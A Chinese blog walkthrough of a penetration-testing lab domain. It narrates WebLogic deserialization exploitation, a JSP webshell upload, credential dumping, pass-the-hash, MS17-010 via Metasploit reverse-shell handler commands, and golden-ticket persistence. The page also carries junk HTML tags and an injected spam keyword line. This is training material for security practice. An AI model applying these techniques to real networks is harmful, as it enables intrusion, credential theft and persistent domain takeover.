<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰|記一次域滲透靶場的內網滲透

    VSole2021-07-26 06:54:16

    環境搭建

    環境說明

    DC:

    ?IP:10.10.10.10?OS:Windows 2012

    WEB:

    ?IP1:10.10.10.80?IP2:192.168.111.80?OS:Windows 2008?網站搭建:Weblogic 10.3.6 MSSQL 2008

    PC:

    ?IP1:10.10.10.201?IP2:192.168.111.201?OS:Windows 7

    攻擊機:

    ?IP:192.168.111.129?OS:Windows 10?IP:192.168.111.128?OS:Kali

    內網網段:10.10.10.0/24 DMZ網段:192.168.111.0/24

    進入C:\Oracle\Middleware\user_projects\domains\base_domain\bin目錄下管理員身份開啟startWeblogic批處理程序

    web打點

    使用nmap掃描端口

    有445 SMB,3389 RDP登端口開啟 1433端口和7001端口分別是是MSSQL和Weblogic服務

    訪問端口看看

    這里有個報錯,我們先不管,由于是WebLogic,默認目錄http://xxxxxx:7001/console下為后臺管理頁面登錄

    嘗試弱密碼后無果,使用工具嘗試WebLogic漏反序列化漏洞,即CVE-2019-2725

    命令也能成功執行

    這里就想上傳一個穩定的webshell,用其他更強大的webshell工具去連

    于是就想傳一個webshell,用其他webshell工具去連 上傳冰蝎jsp馬到目錄C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

    連接成功

    這里已經發現是一張雙網卡主機,有可能10段通向內網

    無ipc連接,net view命令無法使用

    并已知是域內主機

    查看進程無殺軟,也無瀏覽器等信息(無法抓取瀏覽器密碼),并且net命令返回ERROR 5 這是沒有權限,于是準備反彈shell到后滲透神器cs,進行提權等操作

    后滲透(內網漫游)

    提權及信息獲取

    直接powershell上線

    甜土豆進行提權

    通過nslookup查詢dns記錄,這里查到一個10.10.10.10的ip,在域內,這個ip很有可能就是域控

    又通過net time查到主域名稱

    抓取本機密碼

    可以看到其中有mssql明文密碼和Administrator明文密碼

    準備3389連接,不過無論是Administrator還是de1ay都無法登錄,準備添加一個賬戶,但添加后說沒有權限,應該是普通用戶組沒有權限

    使用命令添加到管理員組,連接成功

    橫向移動

    掃描下同網段其他主機

    掃描192.168.111.0/24以及他們的端口,發現一臺名為PC主機,并且3389開啟

    再掃描10段

    發現一臺名為DC主機,看著名字就知道是域控,加上剛剛探測dns和主域名稱,并且他的ip是10.10.10.10,基本可以判斷這臺就是域控

    psexec

    那么在域控明確的情況下優先處理DC,首先想到的就是pth,因為域內很多密碼都是批量設置的,這必須要試一下 使用當前抓取的Administrator賬戶和密碼來傳遞

    這里應該是成功了,但是遲遲未上線

    太概率是由于對方不出網,無法形成反向shell,不出網的話一般就用smb處理,翻回剛剛的掃描記錄,對方445端口是開啟的,可以使用smb拿不出網主機

    新增一個SMB beacon

    再次使用psexec pass the hash

    成功拿下DC

    MS17010

    那么這里換一種思路,如果pth失敗了,怎么辦,那就要使用已知漏洞,比如MS7010 這里使用Ladon對10段掃描漏洞,發現DC是有漏洞的

    在cs上不方便操作,派生會話給msf 首先在msf上執行如下操作

    ?use exploit/multi/handler?set payload windows/meterpreter/reverse_http(跟cs上選用的payload一樣)?set lhost 本機ip?set lport 接受的端口?exploit 執行


    回到cs上創建一個foreign監聽的listeners

    創建后右鍵WEB選擇增加會話

    選擇msf的payload

    msf等待shel反彈即可

    由于目標不出網,需要先添加路由

    ?run get_local_subnets?run autoroute -s 10.10.10.0/24?run autoroute -p

    一開始使用windows/smb/ms17_010_eternalblue這個模塊

    已經攻擊成功了但是沒有session返回,去看了一眼,好家伙,直接藍屏

    所以這個模塊一定要慎用。索性換個模塊 成功拿下

    抓取DC密碼

    hashdump

    有了域內KRBTGT賬戶的hash就可以偽造黃金票據

    logonpasswords

    查詢域管賬戶

    DC就算是拿下了

    用相同的方式拿下PC

    PC是出網的可以直接用http beacon

    權限維持

    做權限維持方式很多,粘滯鍵、啟動項、影子用戶等等。這次是拿到域控,這種情況下,黃金票據是一個很好的維權手段 黃金票據是偽造票據授予票據(TGT),也被稱為認證票據。TGT僅用于向域控制器上的密鑰分配中心(KDC)證明用戶已被其他域控制器認證。

    黃金票據的條件要求:

    1.域名稱2.域的SID值3.域的KRBTGT賬戶NTLM密碼哈希4.偽造用戶名

    黃金票據可以在擁有普通域用戶權限和KRBTGT賬號的哈希的情況下用來獲取域管理員權限,上面已經獲得域控的 system 權限了,還可以使用黃金票據做權限維持,當域控權限掉后,在通過域內其他任意機器偽造票據重新獲取最高權限。

    這里我們已經拿到了KRBTGT賬戶的hash值

    并且也拿到了域的SID值,去掉最后的-1001

    就可以偽造一張黃金票據

    選擇最邊緣的web

    偽造黃金票據成功

    這里為了測試用了PC,一開始是無法訪問域控目錄的

    生成黃金票據后

    即使域控這臺主機權限掉了,我們也能使用其他邊緣主機用這個黃金票據模擬獲得最高權限,而且由于跳過AS驗證,無需擔心域管密碼被修改

    添加域管賬戶

    在域控上查看域管賬戶,添加成功

    軟件webshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    應急響應之入侵排查
    2022-07-19 17:10:59
    常見的應急響應事件分類: Web入侵:網頁掛馬、主頁篡改、Webshell 系統入侵:病毒木馬、勒索軟件、遠控后門 網絡攻擊:DDOS攻擊、DNS劫持、ARP欺騙
    一、前言 二、Windows入侵排查 檢查系統賬號安全 檢查異常端口、進程 檢查啟動項、計劃任務、服務 檢查系統相關信息 自動化查殺 日志分析 三、Linux入侵排查 賬號安全 歷史命令 檢查異常端口 檢查異常進程 檢查開機啟動項 檢查定時任務 檢查服務 檢查異常文件 檢查系統日志
    驗證發現通過scp遠程拷貝文件至主機與ssh登錄后退出都會產生Received disconnect的日志,如果通過ssh自動化部署,last為何會看不到記錄?目前暫不知曉通過何種方式可以僅將文件放入機器后可以讓程序自動執行,是否還有其他部署方式?
    利用場景僅支持ASP,WScript.Shell、Shell.Application組件被卸載;又或者支持ASP.NET,但是存在有某些安全防護軟件,在這兩種場景下可能無法執行命令、上線和提權等。0x01 中國菜刀中國菜刀中并沒有直接上線和shellcode加載功能,但是有一個自定義代碼執行,我們可以利用這個功能來獲取MSF會話。選擇對應Webshell -> As-Exploits -> 執行自定義Payload -> 執行ASP腳本上線。
    由于低權限用戶無法執行太多操作,可以利用反彈上傳Churrasco.exe,后續可以利用它來做提權。輸入net user指令查看是否添加成功,最后提權成功。linux系統提權思路linux基礎信息收集uname -a 顯示全部系統信息cat /etc/issue 內核信息。
    能夠及時處置工業信息安全事件,減少工業信息安全事件對業務系統影響。
    SentinelOne發現MOVEit文件傳輸服務器應用程序中的CVE-2023-34362漏洞遭到了野外(ITW)攻擊。
    有效防止入侵者通過腳本上傳危險程序或代碼,讓服務運行于安全狀態。防范入侵者執行危險程序防范提權的發生。禁止危險的組件,讓服務器更安全。防范因網站有注入問題導致服務器給入侵。有效的防止未經允許的擴展名腳本惡意執行,如:CER,CDX 等擴展名的木馬。通過根據一組YARA規則爬行文件系統和測試文件來執行檢測。根據項目計劃會逐步覆蓋服務器資產管理、威脅掃描、Webshell掃描查殺、基線檢測等各項功能。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类